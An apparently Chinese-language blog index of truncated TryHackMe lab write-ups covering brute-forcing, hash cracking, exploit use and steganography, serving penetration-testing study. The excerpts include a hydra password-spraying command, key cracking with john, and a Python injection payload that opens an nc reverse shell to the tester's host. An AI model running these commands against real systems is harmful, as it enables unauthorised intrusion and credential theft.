Brute It -TryHackMe
Brute It -TryHackMe一、信息收集 使用nmap对网站ip开放端口进行搜集 使用dirsearch发现网站下面有个admin目录访问看看 是一个管理员登录界面 在这个页面右键源代码发现了给我们的提示,告诉我们这个网站的账户是admin,我们抓包使用yakit进行爆破 二、枚举爆破 接下来使用hydra对网站的密码进行爆破 1hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.255.234 http-post-form "/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid" 拿到了账户密码去登录看看 这里告诉我们john的私钥,已经很明显了先讲私钥保存到本地在使用ssh2john将私钥转化成哈希值在使用john进行爆破 这里成功爆破出密码 rockinroll 使用ssh对john进行登录 我这里遇到了报错这里直接修改私钥权限就...
Crypto & Hashes - TryHackMe
Crypto & Hashes - TryHackMeCrack the hashLevel 1第一题房间地址:https://tryhackme.com/room/crackthehash 这里给我们一串编码,看起来像是md5 长度:32 个十六进制字符(即 128 位)。例如 48bb6e862e54f2a795ffc4e541caed4d。 表示形式:通常小写或大写 hex(0–9 a–f / A–F)。 我们使用网站进行破解MD5这个网站是一个专门对md5破解的网站 第二题 这个编码有点不认识使用hasdid识别一下 hashid(Python,命令行,轻量) 安装:sudo apt update && sudo apt install -y hashid 或 pip3 install hashid 1hashid CBFDAC6008F9CAB4083784CBD1874F76618D2A97 这里显示SHA-1的可能性比较高,我们拿到网站上破解一下,依旧是上面那个网站 SHA-1特征 字符集:0–9, a–f ...
DevelPy-TryHackMe
DevelPy-TryHackMe一、信息收集 这次没有开放80端口了,这里nmap扫描出来给了一个很奇怪的服务,这看起来像是靶机作者故意写的一个 交互式 Python 脚本服务,挂在 10000 端口,它会要求你输入内容,然后报错(显示 Python 源码片段),用nc连接试试 1nmap -sV -sC -O 10.10.216.119 二、内网渗透 我这里使用nc连接然后输入了10 这里就返回来 10次数据包,如果开发者用了危险函数(比如 eval(input()) 或 os.system(input())),那就有可能 输入被当成命令执行。 这里我们尝试执行命令的 Python 代码,成功看到了用户权限,那么我们这里就直接构建payload反弹shell 1__import__('os').system('id') 构造payload发送过去 1__import__('os').system('nc -e /bin/sh 10.17.35.134 4444 ') ...
Ignite – TryHackMe
Ignite – TryHackMe一、信息收集 开启房间后给了我们一个ip地址,去访问看看 我们使用nmap对这个ip的端口进行扫描一下开开有什么开放的端口 这里只开放了一个80端口,访问这个网站介绍了一下是一个cms系统Fuel CMS 1.4 里面大致介绍了一下这个cms的安装指南,里面还管理员的后台地址http://10.10.149.22/fuel和账户密码 去后台管理看一下,在页面这里能进行文件上传 二、漏洞利用 现在知道这个cms版本我们使用searchsploit看看是否有这个版本的漏洞 searchsploit 用来在本地搜索 Exploit-DB 漏洞利用库。 它可以帮你快速找到某个软件/服务/系统对应的已知漏洞和可利用代码(PoC/Exploit)。 先复制出来会在你当前目录生成 查看源码nano 47138.py 将里面的ip更新为要攻击的靶机的ip地址,脚本默认要通过 127.0.0.1:8080 代理发送请求(通常是用来抓 BurpSuite 的包),但是你地并没有开 Burp ...
Jack-of-All-Trades
Jack-of-All-Trades一、信息收集 先使用nmap扫一下Ip看看开放了哪些端口,这里很奇怪,22端口上面却是部署着http协议,看了一下wp这里要使用浏览器绕过这个限制 1nmap -sS -A -Pn 10.10.196.165 这里使用firefox,在导航栏里面搜索about config然后再出来的搜索框这里再搜索network.security.ports.banned.override在某些 Firefox 版本中,这可能会显示无结果(在这种情况下,在页面上右键单击任何位置,选择 new -> String 并将搜索查询用作首选项名称)——在其他版本中,它将显示与我相同的内容 选择字符串后,然后添加上22 接着再刷新页面就能成功访问了 这里使用dirsearch扫一下这个ip看看有什么文件,这里记得要加22端口 1python3 dirsearch.py -u http://10.10.196.165:22 -e php,html,txt -t 50 -x 403,401 只有一个assets访问一下里面有什么 ...
Linux 配置环境常用命令
Linux 配置环境常用命令~(持续更新)1.在Linux下创建快捷启动方式拿 Oneforall 为例:一、创建全局启动脚本(推荐方案) 步骤 1:创建系统级命令文件 1sudo nano /usr/local/bin/oneforall 步骤 2:写入脚本内容(基于 ) 1234567#!/bin/bash# 激活 OneForAll 的虚拟环境source /opt/OneForAll/venv/bin/activate# 执行 OneForAll 主程序并传递参数python /opt/OneForAll/oneforall.py "$@"# 退出虚拟环境deactivate 步骤 3:赋予执行权限 1sudo chmod +x /usr/local/bin/oneforall 步骤 4:全局验证 123cd / # 切换到根目录oneforall --help # 应显示帮助信息oneforall --target baidu.com run # 测试扫描 2.创建 Python 中用于创建虚拟环境的核心命令1.创建环境 1python...
Madness - TryHackMe
Madness - TryHackMe一、信息收集使用nmap对网站ip端口开放进行探测 1nmap -sS -sV -A -Pn 10.10.35.188 这里开放了一个22端口和80端口访问一下 是个配置目录 使用dirsearch看看还有没有其他隐藏页面 1dirsearch -u http://10.10.35.188/ -e php,html,txt -t 100 这里有个登录页面登录显示NotFound 二、渗透利用无法了先看看首页的源码吧 右键查看源代码 这里有个图片 thm.jpg 访问一下显示图片已经损坏了,我们把他下载下来仔细研究一下 这里就很奇怪,这个文件是jpg结尾但是文件二进制格式确实png 我们把开头改回来 改后 修改完后使用xdg-open 查看告诉我们下面有个隐藏的目录访问看看 1hidden directory/th1s_1s_h1dd3n 这里说要输入他的秘密,先右键查看源代码这里给了我们一段提示说是介于0~99之间 在url后面添加上/?secret=1 即可输入秘密 这里先用yakit...
Overpass – TryHackMe
Overpass – TryHackMe一、信息收集 先使用nmap对靶场的端口进行探测 1nmap -sV -A 10.10.97.56 这里开放了22端口和80端口看看网站上面看了一下没有什么用信息 这里使用dirsearch再对网站进行目录扫描一下 1python3 dirsearch.py -u http://10.10.97.56 -e php,html,txt -t 50 -x 403,401 -o result.txt 在这下面发现了还有一个admin目录尝试使用弱口令没有用 二、漏洞利用 翻阅一下这个网站的js,在前端 login.js 里,登录时服务端返回的内容会被直接存到 Cookie: 1Cookies.set("SessionToken", statusOrCookie) 如果返回 "Incorrect credentials",就说明密码错误。 但只要返回的不是 "Incorrect credentials",这个值就会被保存成 SessionToken。 ...
Psycho Break Writeup TryHackMe
Psycho Break| Writeup | TryHackMe一、信息收集 使用nmap扫描ip开放端口 1nmap -sS -sV -A 10.10.150.108 使用dirsearch扫描网站隐藏目录 1dirsearch -u http://10.10.150.108 -w /usr/share/wordlists/dirb/common.txt -t 50 访问网站右键查看源代码发现了一个隐藏的页面/sadistRoom 看看里面有什么 恶灵附身第一关的屠夫,想当被屠夫拿电锯被追的紧迫感到现在还能想起,先不管了,看看钥匙看看 浏览器给了一个弹窗给我们 1532219a04ab7a02b56faafbec1a4c1ea 点击确定后,我们会进入这个房间如果一段时间没有逃离房间会被显示塞巴斯蒂安死亡,这里点击Go to Locker Room输入上面的钥匙后就能前往更衣室 偷偷告诉你,躲在床下引诱那个屠夫过来,在他背后捅他18刀就变成绿色浓液了 这里提示我们map的access key 是需要对Tizmg_nv_zxxvh...
TryHackMe Cicada-3301 Vol1
TryHackMe | Cicada-3301 Vol:1一、分析音频软件先把文件下载到本地使用unzip解压缩,得到一个音频文件和一个图片 我们这边先查看一下图片里面是什么内容 大致意思:你好。我们正在寻找高智商的人。为了找到他们,我们设计了一个测试。 这张图片里藏有一条信息。找到它,它会指引你踏上寻找我们的道路。我们期待着见到那些能一路坚持到底的少数人。 祝你好运 这个图片里面藏着有一条信息,我们这里先分析音频根据页面的提示使用 Sonic Visualizer 分析音频 Sonic Visualiser(中文一般叫「声波可视化工具」)是一个专门用来 可视化和分析音频文件 的开源软件。 它和普通的音乐播放器(比如 VLC、mpv)不同,重点在于「看」而不是「听」: 12345# 安装方法sudo apt updatesudo apt install sonic-visualiser# 运行sonic-visualiser filename.wav 使用命令查看文件后然后在菜单 Pane → Add Spectrogram 就能看到频谱图,出来是一...








